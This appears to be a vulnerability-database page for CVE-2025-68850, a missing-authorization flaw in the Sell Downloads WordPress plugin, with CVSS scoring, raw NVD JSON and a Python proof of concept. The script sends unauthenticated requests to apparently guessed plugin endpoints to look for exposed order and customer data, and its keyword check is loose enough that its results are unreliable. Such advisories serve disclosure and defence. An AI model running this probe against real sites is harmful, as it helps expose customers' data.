Security Vulnerability Report
中文
CVE-2025-68850 CVSS 7.5 HIGH

CVE-2025-68850

Published: 2026-01-05 11:17:42
Last Modified: 2026-04-29 10:16:53

Description

Missing Authorization vulnerability in codepeople Sell Downloads sell-downloads allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sell Downloads: from n/a through <= 1.1.12.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sell Downloads插件 <= 1.1.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-68850 PoC - Missing Authorization in Sell Downloads Plugin # Target: WordPress site with Sell Downloads plugin <= 1.1.12 TARGET_URL = "http://target-wordpress-site.com" def check_vulnerability(): """ Check if the target is vulnerable to CVE-2025-68850 This PoC attempts to access protected resources without authentication """ vulnerabilities_found = [] # Try to access plugin's admin ajax endpoints without authentication endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sell_downloads_get_download", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sell_downloads_get_orders", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=sell_downloads_get_products", f"{TARGET_URL}/wp-content/plugins/sell-downloads/includes/api/download.php", f"{TARGET_URL}/?sell_downloads_action=download&file_id=1" ] for endpoint in endpoints: try: response = requests.get(endpoint, timeout=10) # Check if we get unauthorized access (200 OK without login) if response.status_code == 200: # Check response content for sensitive data if any(keyword in response.text.lower() for keyword in ['order', 'product', 'download', 'file', 'price', 'customer']): vulnerabilities_found.append({ 'endpoint': endpoint, 'status': 'VULNERABLE', 'response_length': len(response.text) }) print(f"[!] VULNERABLE: {endpoint}") print(f" Response contains sensitive data: {len(response.text)} bytes") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return vulnerabilities_found if __name__ == "__main__": print("=" * 60) print("CVE-2025-68850 PoC - Sell Downloads Broken Access Control") print("=" * 60) results = check_vulnerability() if results: print(f"\n[!] Found {len(results)} vulnerable endpoints") else: print("\n[+] No obvious vulnerabilities detected")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68850", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:42.120", "lastModified": "2026-04-29T10:16:53.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in codepeople Sell Downloads sell-downloads allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Sell Downloads: from n/a through <= 1.1.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/sell-downloads/vulnerability/wordpress-sell-downloads-plugin-1-1-12-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}